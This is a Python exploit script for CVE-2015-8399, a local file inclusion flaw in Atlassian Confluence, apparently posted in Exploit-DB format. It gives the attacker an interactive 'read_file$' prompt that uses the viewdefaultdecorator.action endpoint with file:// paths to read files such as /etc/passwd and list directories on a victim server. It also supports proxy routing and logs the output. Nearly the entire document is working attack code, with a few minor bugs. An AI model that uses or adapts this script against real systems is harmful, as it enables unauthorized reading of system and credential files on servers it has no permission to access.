#!/usr/bin/env python# -*- coding: utf-8 -*-# Exploit Title: Atlassian Con

1. #!/usr/bin/env python
2. # -*- coding: utf-8 -*-
3.  
4. # Exploit Title: Atlassian Confluence LFI Exploit
5. # Date: 05-11-2016
6. # Exploit Author: Alexander Gurin
7. # Vendor Homepage: https://www.atlassian.com/software/confluence
8. # Software Link: https://www.atlassian.com/software/confluence/download
9. # Version: 5.2, 5.8.14, 5.8.15
10. # Tested on: Linux (Debian, CentOS), Windows 2008R2
11. # CVE : CVE-2015-8399
12.  
13. import sys, os, hashlib, base64, requests, socks, codecs
14. import readline
15. from pprint import pprint
16. from datetime import datetime
17. from requests.packages.urllib3.exceptions import InsecureRequestWarning
18. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
19.  
20. ### Target  settings
21. victim = 'http://victim.org/' ### Set victim host
22.  
23. ### Proxy settings
24.  
25. HTTP_PROXY_ENABLED = 0 # If need to activate, set 1
26. proxies = {'http': 'http://login:password@host:port/', 'https': 'https://login:password@host:port/'} ### HTTP-proxy
27.  
28. ### Set headers
29.  
30. s = requests.Session()
31. s.headers.update({'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'})
32. s.headers.update({'Content-Type':'application/x-www-form-urlencoded'})
33. s.headers.update({'X-Requested-With':'XMLHttpRequest'})
34. s.verify= False
35.  
36. ### Logging all output commands
37.  
38. LOGFILE = os.path.realpath(os.path.dirname(__file__ )) + '/log_' + datetime.strftime(datetime.now(), "%d_%m_%Y") + '.txt'
39.  
40. print ' \033[96m[!]\033[0m For getting file, read_file$/etc/passwd'
41. print ' \033[96m[!]\033[0m For directory listening, read_file$/etc'
42.  
43. def get_my_ip():
44.     while True:
45.         try:
46.             r = s.get('https://api.ipify.org')
47.             if r:
48.                 if r.status_code == 200:
49.                     return r.text
50.         except requests.ConnectionError:
51.             print ' [-] ConnectionError'
52.             time.sleep(20)         
53.  
54. if HTTP_PROXY_ENABLED == 1:
55.     s.proxies = proxies
56.     print ' \033[96m[+]\033[0m Proxy server activated: ' + get_my_ip()
57.  
58. def loger(cmd, data):
59.     f = codecs.open(LOGFILE, encoding='utf-8', mode='a')
60.     f.write('read_file$ %s\n%s\n' % (cmd, data))
61.     f.close()
62.  
63. def reader(url):   
64.     ans = s.get(''+ victim +'spaces/viewdefaultdecorator.action?decoratorName=file://' + url + '').content
65.     start_tag = ans.find("<code>")
66.     end_tag = ans.rfind("</code>")
67.     data = ans[start_tag + 6    : end_tag ]
68.     return data
69.  
70. def main():
71.     while 1:
72.         path = raw_input('\033[96mread_file$ \033[0m')
73.         url = "+ path +"
74.         ans = s.get(''+ victim +'spaces/viewdefaultdecorator.action?decoratorName=file://' + url + '').content
75.         ans = reader(path).replace("<br/>", "\n")
76.         print ans
77.         loger(path, ans)
78.         if path == "quit" : break
79.         if path == "" : print "Not found!"
80.  
81. if __name__ == '__main__':
82.     try:
83.         try:
84.             main()
85.         except KeyboardInterrupt:
86.             sys.exc_clear()
87.         print 'Goodbye! =)'
88.     except Exception:
89.         pass